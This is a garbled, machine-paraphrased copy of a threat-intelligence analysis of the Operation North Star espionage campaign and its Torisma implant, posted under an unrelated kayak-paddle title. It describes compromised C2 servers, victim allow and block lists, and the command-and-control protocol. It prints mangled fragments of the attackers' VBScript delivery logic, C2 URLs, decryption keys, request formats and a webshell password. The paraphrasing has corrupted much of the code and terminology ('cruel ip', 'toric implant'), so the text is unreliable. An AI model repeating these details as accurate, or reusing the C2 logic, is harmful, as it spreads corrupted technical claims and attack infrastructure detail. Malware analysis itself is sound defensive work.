Shoreline Marine X-II Kayak Paddle

Operation North Star: Behind The Scenes

Brief summary

It is seldom possible to get an idea of how large cyber-espionage campaigns are conducted in the digital world. The only transparency offered is the limited visibility of the victims, the malware sample and possibly the IP address of the historical command and control (C2) infrastructure.

Operation North Star, which we described in detail earlier this year, made this possible. The campaign made use of social media sites, special materials and materials with weapons in the hands of employees of defence organisations. This first analysis focused on the initial vectors of the enemy invasion, described the initial stages of implant installation and how the implant interacts with the Command and Control (C2) server.

However, this first announcement left gaps, such as the existence of a secondary charge and additional insight into the way in which the threatening actors carried out their operations and who they targeted. In the updated report we made a one-time deep dive after discovering previously undisclosed information about the internal infrastructure managed by the enemy.

These data show an undiscovered secondary implant called thorisma. More revealing, however, are the operational security measures put in place to stay hidden on compromised systems. In particular, we have seen how the Allow and Block list was applied to ensure that the secondary charge of the attacker did not end up in organisations that were not his target. This tells us that of course a technical innovation has been introduced, not only in the template injection, but also in the enemy operations.

Finally, although we cannot confirm the success rate of enemy attacks, our analysis of C2 logs shows that they have carried out attacks on IP addresses of ISPs in Australia, Israel and Russia, as well as on defence companies based in Russia and India.

The findings in this report are intended to give you, the reader, a unique insight into the technologies and tactics used to attack and compromise systems around the world.

Compromise page

The infrastructure of the North Star C2 operation consisted of compromised areas in Italy and other countries. The disputed areas belonged, for example, to a sewing workshop, an auction house and a printing house. These URLs contain malicious DOTM files, including the malicious ASP page.

  • hxxp://fabianiarte.com:443/uploads/docs/bae_defqa_logo.jpg
  • hxxps://fabianiarte.com/upload/imgProject/912EC803B2CE49E4A541068D495AB570.jpg
  • https://www.fabianiarte.com/include/action/inc-controller-news.asp

The domain fabianiarte.com (fabianiarte.it) has been hacked to host the server’s internal code and malicious DOTM files. This domain contained DOTM files that were used to simulate the work profiles of defense contractors, as in Operation North Star, but the domain also contained rudimentary internal server code that we suspect was used by the implant. Log files and copies of logbooks have appeared in nature in connection with the intrusion into this area and have provided a better understanding. After our analysis of this data cache, this website was hacked under the 7/9/2020 host code.

Two DOTM files were found in this cache with logs and other burglary data. These DOTM files belong to the 510 and 511 campaigns, which are based on a hard-coded value in malicious VB scripts.

  • 22it-34165.jpg
  • 21it-23792.jpg

Anti-analytical technological developments

During our analysis we found two DOTM files in the cache with background data. By analyzing the first phase of the implants, which were connected to the C2 server for seven months, we discovered that the enemy then tried to confuse the analysts.

These DOTM files, which were published in July, contained first-phase implants embedded in the same site as we had documented in our first study.  However, previous implants from other malignant DOTM files were doubly encoded64 and the implants themselves were not further obscured. However, the method has undergone some remarkable changes, which differ from those described in our initial studies:

  • The first step of the implant in a DOTM file uses triple Base64 encoding in the Visual Basic macro.
  • The extracted DLL (desktop.dat) is packed with the Themida Packager, which tries to complicate the analysis.

The first stage of the implant extracted from the DOTM files contains an encrypted configuration file and an intermediate DLL dropper. After decryption, the configuration file contains the information related to the first step of the implementation. The information contains the URL for C2 and the decryption keys for the second phase of the download, called Torisma.

http://server.digimetriq.com/wp-content/uploads/2020/11/Operation-North-Star-Behind-The-Scenes.png

Contents of the decoded configuration

Since the configuration file contains information about the interaction with C2, it also stores the parameters (ned, gl, hl). In this case we see a fourth unknown parameter, known as nl, which is not implemented in the ASP code on the server side. It is possible that the enemy was planning to execute them in the future.

http://server.digimetriq.com/wp-content/uploads/2020/11/1604662454_780_Operation-North-Star-Behind-The-Scenes.png

Appearance nl-Parameter

In addition, by analyzing the back-end components of this hacked server, we can create an activity calendar based on the time the attacker has had access to it. For example, the DOTM files mentioned above were stored on a compromised C2 server in July 2020. Some of the major malicious back-end components were installed on this server in January 2020, indicating that this C2 server had been in use for seven months.

Digging into the heart of the North Star operation – Map

Inc-Controller-News.ASP

As described in our first study of Operation North Star, the general attack included a first-phase implant delivered via DOTM files. During the study, specific parameters used by the implant were found and sent to the C2 server.

Further analysis of the wsdts.db implant in our case showed that it collects information about the victim’s system. For example:

  • Information about the system panels
  • Information about free hard disk space
  • Retrieve computer name and username (registered)
  • Information processing

When this information is collected, it is sent to the C2 server using the parameters (ned, gl, hl).

These parameters are interpreted by a disguised ASP page on the server side, according to the values to be sent, depending on the actions taken against the victim. The ASP server side was hosted on a compromised server in January 2020.

In addition, based on this information, the hostile targeted Windows servers with IIS to install C2 components.

The ASP server side contains an embedded VBS script with a high degree of obfuscation which, once decoded, reveals the code intended to interact with the first level implant. The ASP page is encoded using the VBScript.Encode method, which obscures the VBScript code. The first step of the implementation communicates with the ASP server via these endpoints.

Coded VBS script

After decoding, VBScript recognizes a rather complex set of functions. These functions lead to the insertion of additional step implants into the sacrificial system. These implants are known as Torisma and Doris, both of which are encoded Base64. They are loaded directly into memory via the bitstream as soon as the conditions based on the logic in the script are met.

VBS script decrypted

The ASP server script contains code to create a binary thread in which the Torisma implant is likely to be written. We also discovered that the Torisma implant is embedded in an ASP page and that when decrypting the base64 blob a payload encrypted with the AES algorithm is detected. This ASP page contains evidence that shows the logic that this implant deciphers and delivers to the victim.

getbinary function (sdata)

consttypetext = 2

const binary type = 1

dull binary flow

dusky aaa

aa = adodb.stream

Set the binary thread = creation object(aa)

bitstream.type = ad type text

binarystream.charset = Unicode.

bitstream. open

Bitstream. Write text sdata

Binary position = 0

bitstream.type = atypical

Binary digit = 2

getbinary = read the binary current

last position

Depending on the values sent, additional actions are performed on the target victim. Further analysis of the server script shows that there is a mechanism-dependent logic for placing the victim’s IP address in a solved list file. A second-stage implant is placed in the victim only if this condition is met. This indicates the possibility for the actor to view the data in the background and select victims, probably via another open page of the ASP (template-letter.asp).

The ASP page on the server side contains code to interpret the data sent via the following parameters to execute additional code. The values of these parameters are transmitted by the first stage implant originally supplied with the DOTM files. These parameters were taken into account in our first study, but access to the C2-back code provides additional information about its actual purpose.

Settings Description
NED Campaign code integrated in the DOTM macro
GL System information
HL Flag to indicate the architecture of the operating system (32 or 64 bit)

The URL request string is sent to the C2 server in the following format.

http://hostname/inc-controller-news.asp?ned=campaigncode&gl=base64encodeddata&hl=0

In addition, there is a code to obtain the IP address of the infected victim; this information is used to check whether the IP address is allowed (to obtain the second step) or blocked (to prevent the second step). As mentioned above, adding the victim’s IP address to fake MP3 files is most likely done manually by identifying incoming connections through implementation step 1.

Gettripaddress() function

if the error comes back

cruel ip

ip = request.servervariables(http_client_ip)

when ip =

then ip = request.servervariables(http_x_forwarded_for).

when ip =

then ip = request.servervariables (remote_addr)

End, if the end

when

gettripaddress = ip

last position

The full logical code receives the IP address of the client computer that connects and writes the victim’s data to the log file. If we dissect this code, we see that different functions are used, which is very interesting. These log files are also stored in the WWW root directory of the compromised server based on the strlogpath variables.

The vbscript code fragment below shows that the parameters gl and hl are used to retrieve information about the system from the victim (gl) and about the architecture of the operating system (32 or 64 bits) :

strinfo=substitute(request.form(gl ), + ):strosbit=substitute(request.form(hl ), )

Registration of victims

The enemy monitors the victims by means of logging, which is implemented in ASP code on the server side. In addition, the internal code of the server, as described above, has the ability to register victims based on connections to the first phase of the implementation. This log file is stored in the root directory of the WWW on a compromised C2 server. The following code fragment writes the data in the format (date, IP address, user agent, campaign code (NED), system information (GL), operating system architecture (HL)) to a log file.

strlog = date() & formatdatetime(now(), 4)

r = writing line (strlogpath, strlog)

r = writing line (strlogpath, stripaddr)

r = writing line (strlogpad, strua)

r = writing line (strlogpath, strcondition)

r = writing line (strlogpath, strinfo)

r = writing line (strlogpath, strosbit)

The ASP server code checks whether the IP address is part of a distribution list or a block list. This function checks if the IP address is in two files on the server side that are hidden as MP3 files. The IP address is stored as an MD5-hash, which is included in the server-side code as a function to create an MD5-hash. The code searches for these files in the WWW root of the compromised server based on the strWorkDir variable.

The use of an assignment list is a possible indication that it contained a list of your predefined destinations.

strWorkDir = C::strLogPath=strWorKdir&lole3D_48_02_05.mp3″:strWhiteFile=strWorkDir&wole3D_48_02_05.mp3 :strBlAcKFile=strWorkDir&bole3D_48_02_05.mp3:stripAddr=GeTStrIpAddress():strMD5IpAddr=MD5(strIpAddr):strUA=Request.serveRVariables(HTTP_USER_AGENT ).

Check IP manual/blocking list

The system seems to use a non-standard form of IP refreshing to generate MD5 hits. In most cases, Microsoft’s integrated cryptographic service provider is used to generate the MD5. In this case, however, the agent opted for an adapted method.

The IP address is extracted and hashed in this way.

stripaddr=getstripaddress()

strmd5ipaddr=md5(stripeaddr)

The following function (ipopk) is configured to read the hashed IP addresses from the file where they are stored and then use them in a conditional block operator. The code below opens and reads the file, if no data is present the flag for ipok is 0, if data is present the resulting value is 1

ipok function (hash file, stripaddr)

if the error comes back

fs, fs, linedata

set fso = server.createobject (scripting.file system object)

set fs = fso.opentextfile (hashfile, 1, true)

ipok = 0

at the end of the stream

linedata = lcase(fs.readline)

if len(linedata) > 0 and instr(stripaddr, linedata), then ipok = 1

leave

Hinge when

fr. Focus on

amount of fs = nothing

last position

The following code is the logic to determine whether an infected victim should receive a torisma implant. Depending on the specific conditions set out in the code, a number of cases are considered for decision-making. The cases are explained below:

  • If the victim’s IP address is in the distribution list and the OS architecture bit value is 1 (similar to 64-bit), the 64-bit version of the Torisma implant is sent to the victim and the expression case_1_64 is written after the victim in the log file, which means that the 64-bit version of the Torisma implant is sent.
  • The same in the second case, but now for the 32-bit version of the operating system (value 0) and writes case_1_86, which refers to the 32-bit version of the torizma sent for implementation.
  • If the victim’s IP address is included in the operating system’s list of 32/64 bit architecture blocks, an insensitive load named doris_x86 doris_x64 is sent to the victim. In our case, for example, it was a value for doris_x86 : DoriS_x86=ttttd
  • If Condition 24 is returned by the victim, a log entry with value box_3 is written and the implant is not sent and the status of the http response 405 is sent.
  • If none of the above conditions are met, case_4 is written to the log file, the implant is not sent and another http response with status 405 is sent.

The http-405 response code indicates that the request method is known to the server but not supported by the target source.

if ipok(strwhitefile, strmd5ipaddr) = 1 and instr(strosbit, 1) > 0, then r = writing line(strlogpath, case_1_64) strresdata = strbase64_torisma_x64.

Otherwise, if ipok(strwhitefile, strmd5ipaddr) = 1 and instr(strosbit, 0) > 0, then r = writing line(strlogpath, case_1_86) strresdata = strbase64_torisma_x86.

Otherwise, if ipok(strblackfile, strmd5ipaddr) = 1 and instr(strosbit, 1) > 0, then r = writeline(strlogpath, case_2_64) strresdata = strbase64_doris_x64.

Otherwise, if ipok(strblackfile, strmd5ipaddr) = 1 and instr(strosbit, 0) > 0, then r = writeline(strlogpath, case_2_86) strresdata = strbase64_doris_x86.

Otherwise, if instr(strcondition, 24 ) > 0, then r = write line(strlogpath, case_3 ) response.status = 405.

Otherwise r = writing line (strlogpath, case_4) response.status = 405 end.

2. Logic of inserting the 2. The logic of inserting the 2. The logic of inserting the Victim Level

Internal O-ring implant

One of the main objectives of Operation North Star is to place the torisma implant on the victim’s target based on a number of logics. The ultimate goal is to run a custom shellcode after a Torisma infection to perform custom actions based on specific victim profiles. As described above, Torisma is delivered based on the data that the victim sends to the command and control server. This process is based on the first step implant extracted from the VB macro in the DOTM file.

Total ratio of process and components

In addition, Torisma is a hitherto unknown second-phase implant integrated into the ASP server as a base-64 encoded block. A 64- and 32-bit version is built-in, and depending on the value of the architecture flag sent by the victim, the operating system determines which version is sent. The implant is then loaded directly into the memory as a result of the victim’s interaction with the command and control server. The opponent has made every effort to confuse, encrypt and package the phase 1 and phase 2 implants involved in this particular case.

After decrypting Base64 torisma, the implant is encoded and compressed with the AES key. The ASP server section does not contain any logic for decoding the Torisma implant itself, but is based on the decoding logic in the first stage of the implant. The decryption key consists of an encrypted configuration file containing the URL of the command and control server.

It is therefore difficult to restore the implant if the code of the compromised server is restored.

The decryption method is performed by the first stage implant using the decryption key stored in the configuration file; this key is a 32-bit static AES key. The thorism can be decrypted with the decryption key 78b8 215f40706527ca830c34b23f7.

After deciphering Torisma’s binary, it was found that it was also compressed in lz4, giving it another layer of protection. Now that we have unpacked the code, we can analyze Torisma and its capabilities to better understand how the Noorderster and the level 2 implant work.

The version of the implant analyzed by us was made on 20.7.2020. However, given that inc-controller-news.asp was installed on C2 in early 2020, this indicates the possibility of multiple updates.

Based on this analysis, Torisma sends and receives information with the following URLs.

  • hxxps://www.fabianiarte.com/newsletter/arte/view.asp
  • hxxps://www.commodore.com.tr/mobiquo/appExtt/notdefteri/writenote.php
  • hxxp://scimpex.com:443/admin/assets/backup/requisition.php

Encrypted configuration file

Torisma also uses encrypted configuration files, such as the Stage 1 implant, to specify the URLs with which it communicates as a command and control, and so on.

http://server.digimetriq.com/wp-content/uploads/2020/11/1604662459_481_Operation-North-Star-Behind-The-Scenes.png

Decrypted configuration file

The Torisma configuration file is encrypted using the VEST [1] algorithm in addition to the message sent on the C2 channel. Our research shows that this method of encryption is not normally used anywhere; in fact, it is a proposed encryption that has not become a standard to be implemented in general technology [2].

In addition, the FOUND002.CHK file retrieved from the backend is used to update the configuration and only contains the URL with the .php extension. These URLs have pages with the .php extension, which indicates that part of the backend may be written in PHP. It is unclear what role servers with PHP pages play in the overall attack. Although based on Torisma’s strings and functions, we can confirm that there is code to send and receive files using the view.asp page. This page view.asp is the background of the torisma implant, as shown in our analysis here. Later in this analysis we will go deeper into view.asp, but this page contained basic functions for processing requests and sending and receiving data from an infected victim who had a toric implant.

Basic functionality

According to our analysis, the Torisma Code is an implant specifically designed for specialized monitoring.

Torisma’s role is to monitor new disks added to the system and their connections to the remote desktop. This appears to be a more specialized implant that focuses on actively monitoring the victim’s system and initiating the execution of the load on the basis of the events being monitored. The ultimate goal of Torisma is to run the shellcode on the victim’s system and send the results back to C2.

The toriz code starts at the beginning of the monitoring cycle for collecting information.

Cycle of information collection

Common process

It starts the monitoring program, but first checks whether the monitoring is activated according to the configuration (deactivated by default). The general logic of this process is as follows:

  1. When monitoring has stopped, simply return to
  2. Call the code that performs the monitoring and temporarily deactivate the monitoring when it is complete.
  3. At startup, monitoring is carried out for a certain period of time depending on the value of the configuration.
  4. When the control function returns, the code enters the command and control communication.
  5. In case of repeated communication errors, the implant is monitored for one hour and then tried again.
  6. Repeat forever.

Triggering the monitoring according to the configuration

Follow-up

The monitoring loop obtains the WTSEnumerateSessionsW address and a local Mac address using GetAdaptersInfo.

  1. The code is executed in the loop until sufficient time has elapsed (the parameter decay time) or until the case of interest occurs.

Surveillance loop

  1. It will monitor the increasing number of logical disks and Remote Desktop Sessions (RDS). In this case, the status code is set (5. new reader, 6. new RDS session) and the monitoring loop is stopped.

Keeping an eye on the car

a. It uses GetlogicalDrives to get a bitmap image of all available disks in the system, then iterates on every possible disk letter.

b. It will also use GetDriveType to make sure the new drive is not a CD-ROM drive.

Check drive type

  1. It keeps track of the number of discs previously accessed and returns 1 when the number has increased.

Follow-up of RDP meetings

The RDP session tracking function works in the same way as disk tracking. If the number is increased by one, one is returned. It uses WTSEnumerateSessionsW to get a list of sessions and scrolls through them to count active sessions.

Retrieval of active PDR sessions

Activate RDP sessions. Go on.

Command and control communications

The C2 code is interesting and represents a customer-specific implementation. The general process of this Protocol is as follows.

  1. Generates the connection identifier, which in this step is stored as a hexadecimal string consisting of five random bytes for each module (0x63) and sent randomly with the GetTickCount64 output.

Create a login name

  1. then download the target URL

a. Three hard-coded servers are available for the implant in the form of an encrypted block.

    1. b. The decryption is performed using the VEST-32 encryption algorithm using the hard key ff7172d9c888b7a88a7d77372d7772.

Deciphering the configuration

c. To select this configuration, any configuration number (mod. 6) is selected.

d. Only 3 configurations are available; if the number of the selected configuration exceeds 3, it will continue to increase (mod 6) until one of the configurations is selected. This process will most likely result in the selection of configuration 0.

Code for selecting the configuration

  1. It sends a POST request to the URL it received from the configuration with the VIEW action. It creates the query with the following hard-coded format string.
item => ACTION=VIEW&PAGE=%s&CODE=%s&HOME=%s&REQUEST=%d

=> PAGE=Drive_Number

CODE=RDS_session_counting

CACHE=basic64(blob)

Request=Rim()

Drops: Dimensions 0x43c

blob [0x434:0x438] = status_code

blob [0x438:0x43c] = 1

blob [0:0x400] = form_url

blob [0x400:0x418] = mac_address

blob [0x418:0x424] = connection_id (random)

blob [0x424:0x434] = MC0921 (UTF-16LE).

a. The process will look at the return of the string that indicates that your application has been accepted. Customer ID: {f9102bc8a7d81ef01ba} to indicate success

  1. If successful, it extracts the data from C2 via a POST request, this time using the PREVPAGE action.

a. The following format set is used for a POST request

ACTION=CODE=C%s&RES=%d

С : CODE = connection_id (from the previous one)

RES = Edge()

b. The response received from the server is encrypted. The following process is required for decryption.

i. Replace the number with +.

ii. Base64 decodes the result

iii. Decrypt the data using key ff7172d9c888b7a88a7d77372d772.

Decrypting the server with the key

iv. Carrying out the XOR procedure for data

Carrying out the XOR procedure for data

    1. The decrypted data is used to execute the server shellcode and return the data.

a. Server data is divided into execution loads and data sent to the server as arguments sent to server
b. The part of the data block sent by the server is used to update the local configuration used for monitoring.

i. The first 8 bytes are entered into the add+xor loop to create the converted version, which compares s with the hard-coded values.

Checking the configuration

Configuration check continues

ii. If the converted data corresponds to one of the two hard-coded values, the local configuration is updated.

iii. In addition, the monitoring time (for the driving cycle / RDS) can be updated by the server.

iv. If the duration is longer than 0x7620 (21 days), monitoring is reactivated even if deactivated by the above configuration.

v. If the converted data does not correspond to one of the two hard-coded values, monitoring is deactivated using the configuration

c. The implant creates a new line of communication and waits for it to continue. He then continues to run the shellcode and waits for the other wire to complete its work.

d. Depending on what has happened (fault occurred or monitoring enabled/disabled), the code returns a magic value that determines whether the code will be restarted or returned to the monitoring process.

Back to the communication loop

    1. The communication wire creates a new name for the tube (for communication with the shellcode). It warns the other wires when the pipe is ready and then continues sending the data read from the pipe to the server.

a. Pijpnaam \.pipefb4d1181bb09b484d058768598b

Code for the designated line

b. It reads the data from the pipe (and marks the treatment as complete when it finds – – – – – – – – – – – – – -).

c. Subsequently, the read data is sent back to C2 by sending a POST in the following format

ACTION = NEXT PAGE

ACTION=NEXTEGY AND CODE=S%s&CACHE=%s&RES=%d

CODE=Login ID

CACHE=basic64(message)

RES = Edge()

d. The data is encoded with the same model as before, the data is first XORED and then encoded with VEST-32 using the same key as before.

e. This operation is repeated until the user’s data stream sends a – – – – message or until the message fails.

Campaign identification

One way for the enemy to know which victims are infected with which version of the first stage implant is to use the campaign identifiers. These identifiers are hard-coded into the VB macros of the document file templates that are extracted with maldoc in a first step.

As described above, they are sent to the internal server via the NED parameter and then read and interpreted by the ASP code.

http://server.digimetriq.com/wp-content/uploads/2020/11/1604662475_101_Operation-North-Star-Behind-The-Scenes.png

Victim support

The source access logs for Inc-Controller-News.asp will tell you which countries are concerned, and they match the logs we found on another .asp page (view.asp), which we will discuss later in this document.

Based on one of the C2 logs, we were able to identify the following victims:

  • Russian military contractor
  • Two IP addresses in two ISP address spaces in Israel
  • IP addresses in a provider’s Australian region
  • IP address in the address space of the Russian provider
  • Indian military contractor

a sample letter.

In the course of our research, we found additional information that led to the discovery of other ASP pages. An ASP page on the same compromised command and control server contained interesting code. First of all, this ASP page is encoded using the same VB.Encode method we saw in the code provided by the Torisma implant. Secondly, the code appears to be part of the base kernel managed by the attacker and had the original filename board_list.asp. Based on wildcard data, board_list.asp first appeared in Korea in October 2017, indicating that this code has been used for this webshell since 2017.

In addition, this ASP page is a custom-made webshell, which as far as we know and know is not a conventional ready-made webshell, but something that is used specifically for these attacks. Some of these actions include viewing files, executing commands, connecting to the database, etc. The attacker will see a login page and the default Venus password, encrypted by base64, can be used to login (this value is hard-coded in the source code of this page).

Template-Letter.ASP homepage

Functionality for the execution of commands

VIEW.ASP – Thorisma backend

The View.ASP file is just as important as the inc-controller-news.asp file and contains interesting functions. This ASP page is the internal code of the Torisma implant and its functions are designed to interact with an infected victim.

The view.asp file contains the following links in the :

The file FOUND001.CHK contains the log file because the name of the CONST value probably refers to logvault.

The analysis of potential victims yielded an interesting list:

  • Russian military contractor
  • Two IP addresses in two ISP address spaces in Israel
  • IP address in the address space of the Russian provider
  • Indian military contractor

The file FOUND002.CHK contains the Base64 string that has been decoded:

hxxps://|||| 2|/blog/js/view.php|NT

The above area was probably compromised to host malicious code because it belongs to an Indian computer training company.

The const value for FOUND002.CHK is cfgvault, the first three letters can refer to the configuration. This ASP code contains additional functions that can show the role of this page in the overall system of things. View.asp is the backend code of the Torisma implant with many functions implemented to process implant requests, as described earlier in this analysis. Our analysis of the torisma implant and this dorsal code led to some interesting findings.  The ASP code is the first to perform common actions that this backend can perform based on its interaction with Torisma.

Some of these actions are caused by an implant connection, while others may be caused by a different process. The ASP home page is implemented to process incoming requests based on an ACTION request with several possible call options. Since the implant is controlled by the ACTION method when there is C2 communication, several such cases can be selected. However, we only see code implemented in Torisma to invoke and process the NEXTPAGE and PREVPAGE request/response mechanisms, so these other actions are most likely performed by the enemy through a different process.

http://server.digimetriq.com/wp-content/uploads/2020/11/1604662482_523_Operation-North-Star-Behind-The-Scenes.png

General actions for View.ASP

ViewPreviewPage

As described in the analysis, ViewPrevPage is a function for processing Torisma’s incoming data requests. The data sent to Torisma looks like ~dmf files. This content for the ViewPrevPage action is provided as shell code to be carried out on the victim’s side according to the analysis of the implant itself.

ViewPrevPage function

View Next page

Torisma uses this method to return data read from a named pipe to a C2 server. These are the results of the execution of the shellcode on the victim system by the ViewPrevPage action and the results of this execution are sent and processed by this function.

The implant sends the data to C2.

Gallery

Torisma does not implement a function to call this function directly, it is very likely that it will be called by another management tool that is probably implemented on a high level server. Static analysis of this method shows that it is most likely intended to receive log files in basic64 encoding and write the answer. As with the Torisma implant, there is a response string that is received by the calling component, indicating that the log file has been successfully received and that it must then delete the log file.

Extracting and storing the contents of log files in basic64 format (ViewGallery)

ViewMons

Another feature that Torisma does not use is the installation of a local configuration file. It seems to use an interrogation method other than ACTION; in this case MAILTO is used. Based on the knowledge gained with Torisma, we can assume that this is related to the configuration files used by the implant.

http://server.digimetriq.com/wp-content/uploads/2020/11/1604662486_590_Operation-North-Star-Behind-The-Scenes.png

ViewMons function

SendData

This function is used exclusively in the RedirectToAdmin method and is a mechanism for sending data to C2 upstream. This depends on the GetConfig function, which is based on the value stored in the cfgvault variable.

Send data

Forwarding to the administration

This function is used to redirect information from an infected victim to the main upstream server. This is an interesting feature that indicates additional infrastructure beyond the direct C2 with which Torisma communicated.

Forwarding to the administration

WritingAgentLog

As part of Torisma’s victim tracking, the ASP code has a logging function. The resulting log files indicate that the shellcode was able to make Torisma’s victims work. This recording method records the user agent and the IP address of the monitored victim. This function is called when information is sent to the main server using the RedirectToAdmin method.

Analysis of the server log shows that the following countries are connected to View.ASP in July 2020

  • India
  • Australia
  • Israel
  • Finland

Websites .

During our analysis we discovered that in some cases the attacker used web shells to support access. On another hacked server discovered by the same actor with the same type of code, PHP Webshell, known as Viper 1337 Uploader, was discovered. According to our analysis, this is a modified version of the Viper 1337 charger.

 

 

Further analysis of the log file shows that the dotm file with the extension a. jpg was accessed via the Israeli IP address. This IP address probably belongs to the victim in Israel who executed the primary DOCX. Based on the analysis of a User-Agent string associated with the Israeli IP address, Microsoft+Office+Existence+Discovery indicates that this point file was downloaded from Microsoft Office (insert template).

Source of the attack

According to our analysis, the attacker accessed and placed the malicious ASP script template letter.asp from the IP address 104.194.220.87 to 7/9/2020.  Further investigation shows that the attacker came from a service known as VPN Consumer in New York, New York.

Extract from the log file indicating the IP 104.194.220.87 of the attacker.

In the same log files we saw the following line in the user-agent chain :

Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+10.0;+Win64;+x64;+Trident/7.0;+.NET4. +.NET4. +ms-Büro;+MSO-Büro+16)

By deciphering the user-agent chain we can make the following statement

The attacker uses 64-bit Windows 10 and Office 2016 platforms.

The Office version is the same as the version we observed in the creation of Word documents, as described in our analysis of the documentation part of Operation North Star.

Conclusion

We do not often have the possibility to get the code pages of the C2 server and the corresponding logins for analysis. Where we started with the first analysis of the first phase of the payload, we were able to decipher and discover layer by layer, which gave us a unique insight into the campaign.

Analysis of the log revealed potential targets not known to us after the initial analysis of Operation North Star, including ISPs and defence companies in Russia and India.

Our analysis shows a hitherto unknown second-phase implant, known as Torisma, that performs user-defined shell code to perform user-defined actions based on specific victim profiles. It also shows how the enemy used compromised estates in Italy and other countries belonging to random organizations such as the auction house and the printing house to collect data on victim organizations in different countries during an operation that lasted almost a year.

The campaign was interesting because there was a specific list of objects of interest and this list was checked before a second implant, or 32 or 64 bit, was sent for further checking. The progress of the implants sent by C2 was tracked and recorded in a log file, giving the enemy an idea of which victims were successfully implanted and which could be further monitored.

Ultimately, our findings provide unique insights, not only into how the enemy carries out his attacks, but also how he assesses his victims and decides to continue exploiting them.

Read the McAfee Defender blog to learn more about how to build an adaptive security architecture as part of the Operation North Star campaign.

Special thanks to Philip Laulear for his support in the analysis.

https://www.ecrypt.eu.org/stream/p2ciphers/vest/vest_p2.pdf

2] https://www.ecrypt.eu.org/stream/vestp2.html

x3Cimg height=1 width=1 style=display:no src=https://www.facebook.com/tr?id=766537420057144&ev=PageView&noscript=1 />x3C/noscript>’) ;

Related Tags:

linus torvalds,windows